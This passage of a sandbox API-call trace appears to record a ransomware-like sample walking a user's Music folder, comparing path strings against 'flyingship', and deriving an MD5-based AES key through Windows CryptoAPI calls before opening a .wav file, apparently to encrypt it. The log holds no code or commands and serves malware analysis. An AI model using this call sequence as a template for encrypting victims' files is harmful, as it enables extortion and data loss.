HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lagIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gIQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qtz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tz\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LfTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fTuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TuLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uLY5i.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.592] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.592] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.593] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.593] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x8a4c7a00, ftLastWriteTime.dwHighDateTime=0x1d5da34, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0x90af58 [0184.593] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.593] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.593] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0184.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.594] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.595] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.595] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.595] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.596] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0184.596] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0184.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.596] CryptHashData (hHash=0x90ae18, pbData=0x8debf0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0184.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.596] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.596] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0184.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.596] CryptDestroyHash (hHash=0x90ae18) returned 1 [0184.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\lftuly5i.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.598] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.598] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0184.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0184.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0184.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0184.599] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0184.599] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0184.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0184.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0184.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0184.600] 